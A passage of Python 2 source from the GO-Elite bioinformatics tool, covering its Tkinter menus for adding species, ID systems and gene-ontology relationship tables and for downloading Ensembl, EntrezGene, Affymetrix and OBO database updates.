except Exception: gene_system_file = ''
if new_system_code in system_code_db:
if new_system_name == system_code_db[new_system_code]:
print_out = 'The system code and name entered already exist.\nSelect replace to change the "MOD" status.'
fw = FeedbackWindow(print_out,'Replace',"Don't Replace")
choice = fw.ButtonSelection()['button']
if choice != 'Replace': GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
else:
print_out = 'The system code entered already exists.\nSelect replace to system information.'
fw = FeedbackWindow(print_out,'Replace',"Don't Replace")
choice = fw.ButtonSelection()['button']
if choice != 'Replace': GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
elif new_system_name in system_codes:
print_out = 'The system name entered already exists.\nSelect replace to system information.'
fw = FeedbackWindow(print_out,'Replace',"Don't Replace")
choice = fw.ButtonSelection()['button']
if choice != 'Replace': GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
if new_mod == 'yes':
new_mod = 'MOD'
if len(gene_system_file) == 0:
new_system_name = ''; new_system_code = ''
else:
new_mod = ''
if '-' in new_system_name:
print_out = 'The system name contains the invalid character "-".\nPlease change and try again.'
fw = FeedbackWindow(print_out,'Continue',"")
choice = fw.ButtonSelection()['button']
new_system_name=''; new_system_code=''
elif new_system_name == '' or new_system_code =='':
print_out = "No system name or system code specified."
if new_mod == 'MOD':
print_out = "An ID annotation file for this system must be included (required for MODs)"
IndicatorWindow(print_out,'Continue')
### Add new system info
ad = SystemData(new_system_code,new_system_name,new_mod)
system_codes[new_system_name] = ad
exportSystemInfo()
if len(gene_system_file)>0:
root = Tk(); analysis = 'updateAnnotationFiles'
overwrite_annotations = 'yes'
values = gene_system_file,new_system_name,overwrite_annotations,species_code
StatusWindow(root,analysis,values)
GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
elif update_options == 'Add New Relationship Table':
proceed = 'no'
system_list.sort(); system_list.reverse()
system_list += ['----','Gene Ontology']+ resource_list[1:] + ['New Resource'] ### Add all existing resources to this list
system_list.reverse()
option_db['mod_to_update'].setAnalysisOptions(mod_list)
option_db['system_to_update'].setAnalysisOptions(system_list)
while proceed == 'no':
root = Tk(); root.title('GO-Elite: Add New Relationship Table')
gu = GUI(root,option_db,option_group_db['customRelationships'])
mod_to_update = gu.Results()['mod_to_update']
system_to_update = gu.Results()['system_to_update']
new_resource_name = gu.Results()['new_resource_name']
new_resource_type = gu.Results()['new_resource_type']
try: update_custom_relationship_file = gu.Results()['update_custom_relationship_file']
except Exception: update_custom_relationship_file = ''
overwrite_relationships = 'yes'
relationship_to_update = mod_to_update+'-'+system_to_update
if 'Gene Ontology' in system_to_update:
relationship_to_update = mod_to_update+'-GeneOntology'
relationship_to_update_file ='Databases/'+species_code+'/gene-go/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'Disease Ontology' in system_to_update:
relationship_to_update = mod_to_update+'-CTDOntology'
relationship_to_update_file ='Databases/'+species_code+'/gene-go/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'Phenotype Ontology' in system_to_update:
relationship_to_update = mod_to_update+'-MPhenoOntology'
relationship_to_update_file ='Databases/'+species_code+'/gene-go/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'GOSlim' in system_to_update:
relationship_to_update = mod_to_update+'-GOSlim'
relationship_to_update_file ='Databases/'+species_code+'/gene-go/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'WikiPathways' in system_to_update:
relationship_to_update = mod_to_update+'-MAPP'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'miRNA Targets' in system_to_update:
relationship_to_update = mod_to_update+'-microRNATargets'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'BioMarkers' in system_to_update:
relationship_to_update = mod_to_update+'-BioMarkers'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'Domains' in system_to_update:
relationship_to_update = mod_to_update+'-Domains'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'PathwayCommons' in system_to_update:
relationship_to_update = mod_to_update+'-PathwayCommons'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'KEGG' in system_to_update:
relationship_to_update = mod_to_update+'-KEGG'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'Transcription Factor Targets' in system_to_update:
relationship_to_update = mod_to_update+'-TFTargets'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'New Resource' in system_to_update:
relationship_to_update = mod_to_update+'-'+new_resource_name
if new_resource_type == 'Ontology':
relationship_to_update_file ='Databases/'+species_code+'/gene-go/'+relationship_to_update+'.txt'
else:
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
else:
relationship_to_update_file ='Databases/'+species_code+'/uid-gene/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
if file_present == 'yes':
print_out = 'The relationship table already exists. Only\nuse this menu to add new tables and use the\n"Update Existing Relationship Table" to update\nexisting relationships.'
IndicatorWindow(print_out,'Continue'); GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
elif (mod_to_update != system_to_update) and ('----' not in system_to_update):
root = Tk(); analysis = 'updateRelationshipFiles'
values = update_custom_relationship_file,relationship_to_update_file,overwrite_relationships,species_code
StatusWindow(root,analysis,values)
proceed = 'yes'
GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
elif update_options == 'Update Existing Relationship Table':
import_dir1 = '/Databases/'+species_code+'/uid-gene'
import_dir2 = '/Databases/'+species_code+'/gene-mapp'
import_dir3 = '/Databases/'+species_code+'/gene-go'
#import_dir4 = '/Databases/'+species_code+'/gene'
proceed = 'yes'; systems_not_present = []
try: uid_gene_list = read_directory(import_dir1); uid_gene_list.sort()
except Exception: proceed = 'no'; systems_not_present.append('uid-gene'); uid_gene_list = []
try: gene_mapp_list = read_directory(import_dir2); gene_mapp_list.sort()
except Exception: systems_not_present.append('gene-mapp'); gene_mapp_list=[]
try: gene_go_list = read_directory(import_dir3); gene_go_list.sort()
except Exception: systems_not_present.append('gene-go'); gene_go_list=[]
#try: gene_list = read_directory(import_dir4); gene_list.sort()
#except Exception: proceed = 'no'; systems_not_present.append('gene')
if len(gene_go_list) == 1 and 'Ensembl_version.txt' in gene_go_list: gene_go_list=[]
#if len(gene_list) == 0: proceed = 'no'; systems_not_present.append('gene')
elif len(uid_gene_list) == 0: proceed = 'no'; systems_not_present.append('uid-gene')
elif len(gene_mapp_list) == 0 and len(gene_go_list) == 0: proceed = 'no'; systems_not_present.append('gene-mapp'); systems_not_present.append('gene-go')
if (proceed == 'no') or ('gene-mapp' in systems_not_present and 'gene-go' in systems_not_present):
print_out = "Please note: The species directory does not appear\nto have a valid %s table(s). You may need to add before proceeding." % str(systems_not_present)[1:-1]
IndicatorWindow(print_out,'Continue')
#GO_Elite.importGOEliteParameters('skip'); sys.exit()
relationship_dir = gene_go_list+['----']+gene_mapp_list+['----']+uid_gene_list#+['----']+gene_list
relationship_files=[]
for i in relationship_dir:
if '-' in i: relationship_files.append(string.replace(i,'.txt',''))
option_db['relationship_to_update'].setAnalysisOptions(relationship_files)
root = Tk(); root.title('GO-Elite: Update Existing Relationship Table')
gu = GUI(root,option_db,option_group_db['customUpdate'])
relationship_to_update = gu.Results()['relationship_to_update']
update_relationship_file = gu.Results()['update_relationship_file']
overwrite_relationships = gu.Results()['overwrite_relationships']
if relationship_to_update != '----':
file = relationship_to_update+'.txt'
if file in gene_mapp_list:
relationship_to_update = 'Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
elif file in gene_go_list:
relationship_to_update = 'Databases/'+species_code+'/gene-go/'+relationship_to_update+'.txt'
root = Tk(); analysis = 'updateRelationshipFiles'
values = update_relationship_file,relationship_to_update,overwrite_relationships,species_code
StatusWindow(root,analysis,values)
elif modifyDBs == 'Manually Add New Relationships':
print_out = "Please Install a Species Database or Add New Species Support"
IndicatorWindow(print_out,'Continue')
GO_Elite.importGOEliteParameters('skip'); sys.exit()
if modifyDBs == 'EntrezGene-GO Associations':
if len(species_codes)>0:
species = '---'
while '--' in species:
root = Tk(); root.title('GO-Elite: EntrezGene-GO Update Options')
gu = GUI(root,option_db,option_group_db['updateEntrezGO'])
species = gu.Results()['species_eg_update']; compatible_mods = []
try: species_code = [species_codes[species].SpeciesCode()]
except KeyError: species_code = '--'
download_entrez_go = gu.Results()['download_entrez_go']
incorporate_previous_associations_EG = gu.Results()['incorporate_previous_associations_EG']
if incorporate_previous_associations_EG == 'update previous relationships':
rewrite_existing_EG = 'no'
else: rewrite_existing_EG = 'yes'
#overwrite_entrezgo = gu.Results()['overwrite_entrezgo']
overwrite_entrezgo = 'over-write previous databases' ### Don't include this option... save to NewDatabases
remove_download_files = gu.Results()['delete_entrezgo']
status = ''
if species_code != '----' and species != 'New Species' and species != 'all-supported':
taxid = species_codes[species].TaxID()
#species = 'New Species' ### Must designate a taxid
compatible_mods = species_codes[species].Systems()
if species == 'New Species':
new_run_parameter = modifyDBs
modifyDBs = 'Add New Species Support'; species=''
if species == 'all-supported':
tax_ids=[]; species_code = []
for species in species_codes:
taxid = species_codes[species].TaxID(); tax_ids.append(taxid)
sp_code = species_codes[species].SpeciesCode(); species_code.append(sp_code)
elif len(species)>1: tax_ids = [species_codes[species].TaxID()]
if modifyDBs != 'Add New Species Support':
if download_entrez_go == 'yes':
root = Tk(); analysis = 'DownloadEntrezGO'
values = ncbi_go_file,'BuildDBs/Entrez/Gene2GO/','txt',tax_ids,species_code,overwrite_entrezgo, rewrite_existing_EG
StatusWindow(root,analysis,values)
root = Tk(); analysis = 'EntrezGOExport'
values = tax_ids,species_code,status,option_db,option_group_db['gene2go_not_found'],overwrite_entrezgo, rewrite_existing_EG
StatusWindow(root,analysis,values)
else:
print_out = "Please Install a Species Database or or Add New Species Support"
IndicatorWindow(print_out,'Continue')
GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
if modifyDBs == 'Download Species Databases':
integrate_online_species = 'yes'
addOnlineSpeciesDatabases()
GO_Elite.importGOEliteParameters('skip'); sys.exit()
if modifyDBs == 'Ensembl Associations':
print_out = "This menu is intended to download and integrate Ensembl\nrelationships from versions and species NOT supported\nby GO-Elite. Current GO-Elite databases already contains\nall relationships for supported species and versions."
IndicatorWindow(print_out,'Continue')
global process_Ens_go
### Download Ensembl Species Information from FTP Server
root = Tk(); analysis = 'getCurrentEnsemblSpecies'
values = None
StatusWindow(root,analysis,values)
option_db['species_ensembl_update'].setAnalysisOptions(ensembl_species)
option_db['ensembl_version'].setAnalysisOptions(ensembl_versions)
root = Tk(); root.title('GO-Elite: Extract Relationships from Online Ensembl Databases')
gu = GUI(root,option_db,option_group_db['updateEnsemblSQL'])
species = gu.Results()['species_ensembl_update']
ensembl_version = gu.Results()['ensembl_version']
try: species_code = species_codes[species].SpeciesCode()
except KeyError: species_code = '--'
incorporate_previous_ensembl_associations = gu.Results()['incorporate_previous_ensembl_associations']
if incorporate_previous_ensembl_associations == 'update previous relationships': rewrite_existing = 'no'
else: rewrite_existing = 'yes'
#overwrite_ensembl = gu.Results()['overwrite_ensembl']
overwrite_ensembl = 'over-write previous databases' ### Don't include this option... save to NewDatabases
remove_download_files = gu.Results()['delete_ensembl']
force = gu.Results()['download_latest_ensembl_files']
### Add species information to database
if species_code == '--':
genus,species_code = string.split(species,' '); species_code = genus[0]+species_code[0]
species_taxid = '' ### Ideally should have but can assign when updating EntrezGene directly
compatible_mods = ['En']
sd = SpeciesData(species_code,species,compatible_mods,species_taxid)
species_codes[species] = sd
exportSpeciesInfo(species_codes)
root = Tk(); analysis = 'getVersionedEnsExternalDB'
values = species,ensembl_version
StatusWindow(root,analysis,values)
external_dbs, external_system, array_systems, external_ids = importExternalDBs(species)
option_db['include_ens1'].setAnalysisOptions(external_dbs)
option_db['include_ens2'].setAnalysisOptions(external_dbs)
option_db['include_ens3'].setAnalysisOptions(external_dbs)
option_db['include_ens4'].setAnalysisOptions(external_dbs)
option_db['include_ens5'].setAnalysisOptions(external_dbs)
root = Tk(); root.title('GO-Elite: Extract Relationships from Online Ensembl Databases')
gu = GUI(root,option_db,option_group_db['updateEnsemblSQL2'])
include_ens1 = gu.Results()['include_ens1']
include_ens2 = gu.Results()['include_ens2']
include_ens3 = gu.Results()['include_ens3']
include_ens4 = gu.Results()['include_ens4']
include_ens5 = gu.Results()['include_ens5']
process_Ens_go = gu.Results()['process_Ens_go']
externalDBName_list = [include_ens1,include_ens2,include_ens3,include_ens4,include_ens5]
if species_code == 'Hs' or species_code == 'Mm' or species_code == 'Rn':
for id in externalDBName_list:
if id in array_db:
print_out = "Attention: Integrating array information for\nthis species will increase download time and will\nrequire > 2GB of hard-drive space. Please confirm\nbefore continuing."
IndicatorWindow(print_out,'Continue')
root = Tk(); analysis = 'EnsemblSQLImport'
values = species_code,species,child_dirs,externalDBName_list,overwrite_ensembl,rewrite_existing,force,ensembl_version,external_system
for external_db in externalDBName_list:
if len(external_db)>1:
syscode = external_system[external_db]
if syscode not in system_code_db:
ad = SystemData(syscode,external_db,'')
system_codes[external_db] = ad
system_code_db[ad.SystemCode()]= external_db
exportSystemInfo()
StatusWindow(root,analysis,values)
if 'WikiPathways' in modifyDBs or 'Affymetrix Annotation files' in modifyDBs:
if 'Affymetrix Annotation files' in modifyDBs:
print_out = "This menu is intended to integrate the most recent\n"
print_out+= "downloaded Affymetrix CSV annotation file relationships.\n"
print_out+= "However, all supported Affymetrix species CSV annotation\n"
print_out+= " files relationships are present in the downloadable databases \n"
print_out+= "from GO-Elite (e.g., EnsMart56Plus - where Plus indicates\n"
print_out+= "the addition of Affymetrix CSV relationships in addition to\nthose from Ensembl)."
IndicatorWindow(print_out,'Continue')
try: option_db['species_affy_update'].setAnalysisOptions(species_list_augmented)
except IOError: null = []
if 'WikiPathways' in modifyDBs: title = 'GO-Elite: WikiPathways Update'
else: title = 'GO-Elite: Affymetrix Annotation Update'
if modifyDBs == 'Affymetrix Annotation files': analysis_option = 'updateAffyCSV'
else: analysis_option = 'WikiPathways'
species = '---'
while '--' in species:
root = Tk(); root.title(title)
gu = GUI(root,option_db,option_group_db[analysis_option])
species = gu.Results()['species_affy_update']
if modifyDBs == 'Affymetrix Annotation files':
process_go = gu.Results()['process_go']
parse_genesets = 'no' #gu.Results()['parse_genesets']
integrate_affy_associations = 'yes'
#else: process_go = 'no'; parse_genesets = 'yes'; integrate_affy_associations = 'no'
#overwrite_affycsv = gu.Results()['overwrite_affycsv']
overwrite_affycsv = 'over-write previous databases' ### Don't include this option... save to NewDatabases
try: incorporate_previous_associations = gu.Results()['incorporate_previous_associations']
except KeyError: incorporate_previous_associations = gu.Results()['incorporate_previous_associations_WP']
try: get_mapped_file_version = gu.Results()['get_mapped_file_version']
except KeyError: get_mapped_file_version = ''
if incorporate_previous_associations == 'update previous relationships':
incorporate_previous_associations = 'yes'
else: incorporate_previous_associations = 'no'
if species == 'all-supported':
species=[]; species_code = []
for sp in species_codes:
species.append(sp)
sp_code = species_codes[sp].SpeciesCode(); species_code.append(sp_code)
elif species == 'New Species':
new_run_parameter = modifyDBs
modifyDBs = 'Add New Species Support'
elif species == '----':
print_out = 'Please select a valid species.'
IndicatorWindow(print_out,'Continue')
GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
else:
species_code = [species_codes[species].SpeciesCode()]
species = [species]
annotation_files_present = 'no'
if modifyDBs != 'Add New Species Support':
while annotation_files_present == 'no':
try: import_dir = '/BuildDBs/Affymetrix/'+species_code[0]
except Exception:
print_out = "Please Install a Species Database or Aor Add New Species Support"
IndicatorWindow(print_out,'Continue')
GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
try: dir_list = read_directory(import_dir) #send a sub_directory to a function to identify all files in a directory
except Exception: ### Occurs if species dir not found
dir_list = []
for affy_data in dir_list: #loop through each file in the directory to output results
affy_data_dir = import_dir[1:]+'/'+affy_data
if '.csv' in affy_data_dir: annotation_files_present = 'yes'
#meta_file_present = verifyFile('Databases/'+species[0]+'/'+'uid-gene/Ensembl_EntrezGene-meta.txt')
if modifyDBs == 'WikiPathways': annotation_files_present = 'yes' # and meta_file_present == 'yes'
elif annotation_files_present == 'no':
print_out = "No Affymetrix annotation files found in the directory:\n"+osfilepath(import_dir[1:])
print_out += "\n\nAtleast one CSV file is needed to parse Affymetrix gene relationships and subsequently"
print_out += "\nprocess WikiPathway relationships.\n\nPress Continue to select a folder containing CSV file(s) from your computer."
IndicatorWindow(print_out,'Continue'); assinged = 'no'
while assinged == 'no':
root = Tk()
root.title('GO-Elite: Select Affymetrix Annotation File(s)')
gu = GUI(root,option_db,option_group_db['InputAnnotationFolder'])
input_annotation_dir = gu.Results()['input_annotation_dir'] + '/'
dir_list = read_directory(input_annotation_dir)
for input_annotation_file in dir_list:
input_annotation_file = input_annotation_dir+input_annotation_file
input_annotation_lower = string.lower(input_annotation_file)
if '.csv' in input_annotation_lower:
assinged = 'yes'
###Thus the CSV was confirmed, so copy it over to BuildDB
icf_list = string.split(input_annotation_file,'/'); csv_short = icf_list[-1]
destination_parent = import_dir[1:]+'/'
info_list = input_annotation_file,osfilepath(destination_parent+csv_short)
StatusWindow(Tk(),'copy',info_list)
root = Tk(); analysis = 'AffyCSV'
values = system_codes,species_code,species,incorporate_previous_associations,process_go,parse_genesets,integrate_affy_associations,overwrite_affycsv,get_mapped_file_version
StatusWindow(root,analysis,values)
if modifyDBs == 'Add New Species Support':
root = Tk(); root.title('GO-Elite: Add New Species Support')
gu = GUI(root,option_db,option_group_db['NewSpecies'])
species_code = gu.Results()['new_species_code']
try: dbase_version = gu.Results()['dbase_version']; exportDBversion(db_version)
except Exception: null = []
new_species_name = gu.Results()['new_species_name']
species_taxid = gu.Results()['species_taxid']
compatible_mods =[]
if species_code in species_code_db:
if new_species_name == species_code_db[species_code]:
print_out = 'The species code and name entered already exist.\nSelect replace to add/change the taxid.'
fw = FeedbackWindow(print_out,'Replace',"Don't Replace")
choice = fw.ButtonSelection()['button']
if choice != 'Replace': GO_Elite.importGOEliteParameters(new_run_parameter); sys.exit()
else:
print_out = 'The species code entered already exists.\nSelect replace to change system information.'
fw = FeedbackWindow(print_out,'Replace',"Don't Replace")
choice = fw.ButtonSelection()['button']
if choice != 'Replace': GO_Elite.importGOEliteParameters(new_run_parameter); sys.exit()
elif new_species_name in species_codes:
print_out = 'The species name entered already exists.\nSelect replace to change system information.'
fw = FeedbackWindow(print_out,'Replace',"Don't Replace")
choice = fw.ButtonSelection()['button']
if choice != 'Replace': GO_Elite.importGOEliteParameters(new_run_parameter); sys.exit()
sd = SpeciesData(species_code,new_species_name,compatible_mods,species_taxid)
species_codes[new_species_name] = sd
exportSpeciesInfo(species_codes)
current_species_dirs = unique.read_directory('/Databases')
if len(current_species_dirs) == 0:
### Hence no official database has been added yet and adding a novel species
new_dir = 'Databases/EnsMart00/'+species_code
export.createExportFolder(new_dir) ### Create a species directory
export.createExportFolder(new_dir+'/gene') ### Add default directories
export.createExportFolder(new_dir+'/gene-go') ### Add default directories
export.createExportFolder(new_dir+'/uid-gene') ### Add default directories
export.createExportFolder(new_dir+'/gene-mapp') ### Add default directories
exportDBversion('EnsMart00')
else:
### An EnsMart directory thus exists
new_dir = 'Databases/'+species_code
try: export.createExportFolder(new_dir) ###Re-Create directory if deleted
except Exception: null=[]
### Indicate that support for this species is now added
print_out = new_species_name+" succesfully added to database. Proceed\nwith addition of ID systems and relationships."
ProcessCompletedWindow(print_out,'Process Completed')
GO_Elite.importGOEliteParameters(new_run_parameter); sys.exit()
if modifyDBs == 'Ontology structure':
print_out = 'This menu is intended to download Ontology Structure annotations\nthat are NOT SUPPORTED from the "Database Species Download" menu.\nHowever, if you would like to get the very most recent files, proceed.'
IndicatorWindow(print_out,'Continue')
root = Tk(); root.title('GO-Elite: Update Options')
gu = GUI(root,option_db,option_group_db['updateOBO'])
OBO_url = gu.Results()['OBO_url']
update_OBO = 'yes' #gu.Results()['update_OBO']
root = Tk(); analysis = 'UpdateOBO'
values = file_location_defaults,update_OBO,OBO_url
StatusWindow(root,analysis,values)
if modifyDBs == 'Additional Resources':
### Allow update of any supported resource (e.g., Ontologies, WikiPathways)
current_species_dirs = unique.read_directory('/Databases')
if len(current_species_dirs) == 0 or 'EnsMart' in current_species_dirs[0]: ### Either no species present or problem with the current config
print_out = "No species support currently found. Select\ncontinue to proceed with species download."
IndicatorWindow(print_out,'Continue')
integrate_online_species = 'yes'
addOnlineSpeciesDatabases()
GO_Elite.importGOEliteParameters(['modifyDBs2',{}]); sys.exit()
option_db['resource_to_update'].setAnalysisOptions(resource_list)
root = Tk(); root.title('GO-Elite: Resource Update Options')
gu = GUI(root,option_db,option_group_db['AdditionalResources'])
species = gu.Results()['species_resources']
additional_resources = gu.Results()['resource_to_update']
species_code = species_codes[species].SpeciesCode()
current_species_dirs = unique.read_directory('/Databases')
root = Tk(); analysis = 'getAdditionalOnlineResources'
values = species_code,additional_resources
StatusWindow(root,analysis,values)
if update_dbs == 'no':
proceed = 'no'
while proceed == 'no':
try: all_species_codes = [species_code]
except Exception:
all_species_codes=[]
for species in current_species_names:
all_species_codes.append(species_codes[species].SpeciesCode())
for species_code in all_species_codes:
### Augment the default resources to filter with others present
default_resources = option_db['resources_to_analyze'].AnalysisOptions()
#print option_db['species'].setAnalysisOptions(current_species_names)
import_dir1 = '/Databases/'+species_code+'/gene-mapp'
import_dir2 = '/Databases/'+species_code+'/gene-go'
try:
gene_mapp_list = read_directory(import_dir1)
gene_mapp_list.sort()
for file in gene_mapp_list:
resource = string.split(file,'-')[-1][:-4]
if resource != 'MAPP' and resource not in default_resources and '.txt' in file:
default_resources.append(resource)
except Exception: null=[]
try:
gene_go_list = read_directory(import_dir2)
gene_go_list.sort()
for file in gene_go_list:
resource = string.split(file,'-')[-1][:-4]
if resource != 'GeneOntology' and resource not in default_resources and 'version' not in resource and '.txt' in file:
default_resources.append(resource)
except Exception: null=[]
option_db['resources_to_analyze'].setAnalysisOptions(default_resources)
root = Tk(); root.title('GO-Elite: Redundancy Filtering Options')
gu = GUI(root,option_db,option_group_db['elite'])
z_threshold = gu.Results()['z_threshold']
resources_to_analyze = gu.Results()['resources_to_analyze']
p_val_threshold = gu.Results()['p_val_threshold']
#include_headers_in_output = gu.Results()['include_headers_in_output']
filter_method = gu.Results()['filter_method']
try:
returnPathways = gu.Results()['returnPathways']
if returnPathways == 'no': returnPathways = None
except Exception: returnPathways = None
try: output_dir = gu.Results()['output_dir']
except KeyError: output_dir = ''
try: input_dir = gu.Results()['mappfinder_dir']
except KeyError: null = ''
if len(input_dir)>0 and len(output_dir)==0:
print_out = "Please select an output directory."
IndicatorWindow(print_out,'Continue')
else:
try:
change_threshold = int(gu.Results()['change_threshold'])-1
null = float(z_threshold)
null = float(p_val_threshold)
proceed = 'yes'
except Exception:
print_out = "Invalid numerical entry. Try again."
IndicatorWindow(print_out,'Continue')
try:
max_member_count = int(gu.Results()['max_member_count'])
if max_member_count < 1: max_member_count = 10000
except Exception: null=[]
except AttributeError,e:
print 'Uknown error encountered... GO-Elite is exiting'
print_out = e; "Unknown User Interface Error Encoutered"
WarningWindow(print_out,print_out); root.destroy(); sys.exit()
file_dirs = input_dir, denom_dir, output_dir, custom_sets_dir
if ORA_algorithm == 'Fisher Exact Test':
permutation = 'FisherExactTest'
else:
try: permutation = int(permutation)
except Exception: null=[]
return species, run_mappfinder, mod, permutation, filter_method, z_threshold, p_val_threshold, change_threshold, resources_to_analyze, max_member_count, returnPathways, file_dirs
def verifyFile(filename):
    """Return 'yes' if *filename* (resolved via filepath) exists and is readable, else 'no'.

    Only the first line is read as an existence/readability probe.
    Fix: the original left the file object to be closed by garbage collection;
    the handle is now closed explicitly.
    """
    fn = filepath(filename)
    file_found = 'yes'
    try:
        open_file = open(fn, 'rU')
        try:
            for line in open_file:
                break  # one read is enough to prove readability
        finally:
            open_file.close()
    except Exception:
        file_found = 'no'
    return file_found
def importResourceList():
    """Return the resource names listed in Config/resource_list.txt, one per line."""
    fn = filepath('Config/resource_list.txt')
    return [cleanUpLine(line) for line in open(fn, 'rU').readlines()]
def updateOBOfiles(file_location_defaults,update_OBO,OBO_url,root):
    """Download the latest Ontology OBO files and archive superseded copies.

    file_location_defaults: Config-derived lookup of default download locations.
    update_OBO: 'yes' to proceed; anything else aborts the download.
    OBO_url: optional explicit OBO URL; when empty, the default 'OBO' entry
        from file_location_defaults is used instead.
    root: Tk root window, or ''/None when running headless. In GUI mode every
        path ends by restarting the parameter workflow and calling sys.exit,
        so this function does not return.
    """
    run_parameter = "Create/Modify Databases"
    if update_OBO == 'yes':
        import OBO_import
        c = OBO_import.GrabFiles()
        # Collect any previously downloaded ontology files under /OBO
        c.setdirectory('/OBO'); file_dirs = c.searchdirectory('.ontology')+c.searchdirectory('.obo')
        if len(OBO_url)>0: obo = OBO_url
        else: ### If not present, get the gene-ontology default OBO file
            obo = file_location_defaults['OBO'].Location()
        fln,status = update.download(obo,'OBO/','')
        run_parameter='Create/Modify Databases'
        # update.download reports connection failures by embedding 'Internet' in status
        if 'Internet' not in status:
            OBO_import.moveOntologyToArchiveDir()
            print_out = 'Finished downloading the latest Ontology OBO files.'
            print print_out
            # Refresh source data; best-effort, failures are ignored
            try: system_codes,source_types,mod_types = GO_Elite.getSourceData()
            except Exception: null=[]
            if root !='' and root !=None:
                InfoWindow(print_out,'Update Complete!')
                continue_to_next_win = Button(text = 'Continue', command = root.destroy)
                continue_to_next_win.pack(side = 'right', padx = 10, pady = 10); root.mainloop()
                GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
            else: null=[]
        else:
            if root !='' and root !=None: WarningWindow(status,'Error Encountered!'); root.destroy(); GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
            else: print status
    else:
        print_out = 'Download Aborted.'
        if root !='' and root !=None: WarningWindow(print_out,print_out); root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
        else: print print_out
def getOnlineEliteConfig(file_location_defaults,root):
base_url = file_location_defaults['url'].Location()
#fln,status = update.download(base_url+'Databases/','Databases/','')
fln1,status1 = update.download(base_url+'Config/species_all.txt','Config/','')
try:
if 'Internet' not in status1:
fln2,status2 = update.download(base_url+'Config/source_data.txt','Config/','')
fln3,status3 = update.download(base_url+'Config/versions.txt','Config/','')
#fln4,status4 = update.download(base_url+'Config/resource_list.txt','Config/','')
print 'Finished downloading the latest configuration files.'; root.destroy()
else:
run_parameter = 'skip'
try: WarningWindow(status3,'Error Encountered!'); root.destroy(); GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
except Exception: print status3; root.destroy(); sys.exit()
except Exception: null=[]
def buildInferrenceTables(species_code):
    """Derive cross-system gene association tables for *species_code*.

    Every step is best-effort: any failure (typically because EntrezGene is
    not supported for this species) is silently skipped so the remaining
    steps still run.
    """
    build_steps = (
        ### Allows for analysis of Ensembl IDs with EntrezGene based GO annotations (which can vary from Ensembl)
        lambda: gene_associations.swapAndExportSystems(species_code,'Ensembl','EntrezGene'),
        lambda: gene_associations.augmentEnsemblGO(species_code),
        ### Build out these symbol association files
        lambda: gene_associations.importGeneData(species_code,('export','Ensembl')),
        lambda: gene_associations.importGeneData(species_code,('export','EntrezGene')),
    )
    for step in build_steps:
        try:
            step()
        except Exception:
            pass
def getAdditionalOnlineResources(species_code,additional_resources,root):
if additional_resources == 'All Resources':
additional_resources = importResourceList()
else: additional_resources = [additional_resources]
try:
print 'Adding supplemental GeneSet and Ontology Collections'
import GeneSetDownloader; force = 'yes'
GeneSetDownloader.buildAccessoryPathwayDatabases([species_code],additional_resources,force)
print_out = 'Finished incorporating additional resources.'
except Exception:
print_out = 'Download error encountered for additional ontologies and gene-sets...\nplease try again later.'
InfoWindow(print_out,'Continue')
try: root.destroy()
except Exception: null=[]
GO_Elite.importGOEliteParameters('skip'); sys.exit()
def getOnlineEliteDatabase(file_location_defaults,db_version,new_species_codes,download_obo,additional_resources,root):
    """Download species database archives (and optionally OBO files) for db_version.

    For each species: download its .zip, build inference tables, optionally
    pull additional resources, then rebuild nested ontologies. Reports the
    outcome via InfoWindow/WarningWindow and may exit the process on failure.
    """
    base_url = file_location_defaults['url'].Location()
    if download_obo == 'yes':
        fln,status = update.download(base_url+'Databases/'+db_version+'/OBO.zip','','')
    for species_code in new_species_codes:
        #print [base_url+'Databases/'+db_version+'/'+species_code+'.zip']
        fln,status = update.download(base_url+'Databases/'+db_version+'/'+species_code+'.zip','Databases/','')
        buildInferrenceTables(species_code)
        ### Attempt to download additional Ontologies and GeneSets
        if additional_resources != '---':
            if additional_resources == 'All Resources': additionalResources = importResourceList()
            else: additionalResources = [additional_resources]
            try:
                print 'Adding supplemental GeneSet and Ontology Collections'
                import GeneSetDownloader; force = 'yes'
                GeneSetDownloader.buildAccessoryPathwayDatabases([species_code],additionalResources,force)
            except Exception: print 'Download error encountered for additional ontologies and gene-sets...\nplease try again later.'
        # Best-effort rebuild of the nested ontology files for this species
        try: buildNestedOntologies(species_code)
        except Exception: None
    # NOTE(review): 'status' is unbound here when download_obo != 'yes' and
    # new_species_codes is empty — confirm callers always request a download.
    if 'Internet' not in status:
